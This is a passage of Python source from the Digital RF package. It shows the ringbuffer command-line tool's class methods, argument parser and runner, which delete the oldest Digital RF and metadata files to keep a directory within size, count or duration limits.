thread.start()
self._task_threads.append(thread)
def join(self):
"""Wait until a KeyboardInterrupt is received to stop ringbuffer."""
try:
while True:
now = datetime.datetime.utcnow().replace(microsecond=0)
interval = int((now - self._start_time).total_seconds())
if (interval % self.status_interval) == 0:
status = self.event_handler.status()
print("{0} | ({1})".format(now, status))
sys.stdout.flush()
if not self.observer.all_alive():
# if not all threads of the observer are alive,
# reinitialize and restart
print("Found stopped thread, reinitializing and restarting.")
sys.stdout.flush()
# first make sure all task threads have stopped
for thread in self._task_threads:
while thread.is_alive():
print("Waiting for task thread to finish.")
sys.stdout.flush()
thread.join(1)
del self._task_threads[:]
self._restart()
time.sleep(1)
except KeyboardInterrupt:
# catch keyboard interrupt and simply exit
pass
finally:
self.stop()
sys.stdout.write("\n")
sys.stdout.flush()
self.observer.join()
def run(self):
"""Start ringbuffer and wait for a KeyboardInterrupt to stop."""
self.start()
self.join()
def stop(self):
"""Stop ringbuffer process."""
self.observer.stop()
def __str__(self):
"""Return string describing ringbuffer."""
amounts = []
if self.size is not None:
amounts.append("{0} bytes".format(self.size))
if self.count is not None:
amounts.append("{0} files".format(self.count))
if self.duration is not None:
amounts.append("{0} s".format(self.duration / 1e3))
s = "DigitalRFRingbuffer of ({0}) in {1}".format(", ".join(amounts), self.path)
return s
def _build_ringbuffer_parser(Parser, *args):
desc = (
"Enforce ringbuffer of Digital RF and Digital Metadata files. When"
" the space threshold is exceeded, the oldest files are deleted until"
" the size constraint is met."
)
parser = Parser(*args, description=desc)
parser.add_argument("path", help="Directory in which to enforce ringbuffer.")
parser.add_argument(
"-z",
"--size",
default=None,
help="""Size of ringbuffer, in bytes or using unit symbols (e.g 100GB).
Negative values are used to indicate all available space except
the given amount. (default: -200MB if no count or duration)""",
)
parser.add_argument(
"-c",
"--count",
type=int,
default=None,
help="""Max file count for each channel. (default: %(default)s)""",
)
parser.add_argument(
"-l",
"--duration",
default=None,
help="""Max duration for each channel in seconds.
(default: %(default)s)""",
)
parser.add_argument(
"-v",
"--verbose",
action="store_true",
help="Print the name new/deleted files and the space consumed.",
)
parser.add_argument(
"-p",
"--status_interval",
type=int,
default=10,
help="""Interval in seconds between printing of status updates.
(default: %(default)s)""",
)
parser.add_argument(
"-n",
"--dryrun",
action="store_true",
help="Do not delete files when expiring them from the ringbuffer.",
)
parser = list_drf._add_time_group(parser)
includegroup = parser.add_argument_group(title="include")
includegroup.add_argument(
"--nodrf",
dest="include_drf",
action="store_false",
help="""Do not ringbuffer Digital RF HDF5 files.
(default: False)""",
)
includegroup.add_argument(
"--nodmd",
dest="include_dmd",
action="store_false",
help="""Do not ringbuffer Digital Metadata HDF5 files.
(default: False)""",
)
parser = watchdog_drf._add_watchdog_group(parser)
parser.set_defaults(func=_run_ringbuffer)
return parser
def _run_ringbuffer(args):
import signal
# parse size string into number of bytes
if args.size == "":
args.size = None
if args.size is not None:
suffixes = OrderedDict(
[
("B", 1),
("KB", 1000 ** 1),
("KiB", 1024 ** 1),
("MB", 1000 ** 2),
("MiB", 1024 ** 2),
("GB", 1000 ** 3),
("GiB", 1024 ** 3),
("TB", 1000 ** 4),
("TiB", 1024 ** 4),
("PB", 1000 ** 5),
("PiB", 1024 ** 5),
]
)
m = re.match(r"(?P<num>\-?\d+\.?\d*)(?P<suf>\D*)", args.size)
if not m:
raise ValueError(
"Size string not recognized. " "Use number followed by suffix."
)
sizenum = eval(m.group("num"))
suf = m.group("suf").strip()
if not suf:
args.size = sizenum
elif suf in suffixes:
args.size = sizenum * suffixes[suf]
else:
raise ValueError(
"Size suffix not recognized. Use one of:\n"
"{0}".format(list(suffixes.keys()))
)
elif args.count is None and args.duration is None:
args.size = -200e6
# evaluate duration to float, from seconds to milliseconds
if args.duration is not None:
args.duration = float(eval(args.duration)) * 1e3
if args.starttime is not None:
args.starttime = util.parse_identifier_to_time(args.starttime)
if args.endtime is not None:
args.endtime = util.parse_identifier_to_time(
args.endtime, ref_datetime=args.starttime
)
kwargs = vars(args).copy()
del kwargs["func"]
# handle SIGTERM (getting killed) gracefully by calling sys.exit
def sigterm_handler(signal, frame):
print("Killed")
sys.stdout.flush()
sys.exit(128 + signal)
signal.signal(signal.SIGTERM, sigterm_handler)
ringbuffer = DigitalRFRingbuffer(**kwargs)
print("Type Ctrl-C to quit.")
ringbuffer.run()
if __name__ == "__main__":
from argparse import ArgumentParser
parser = _build_ringbuffer_parser(ArgumentParser)
args = parser.parse_args()
args.func(args)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.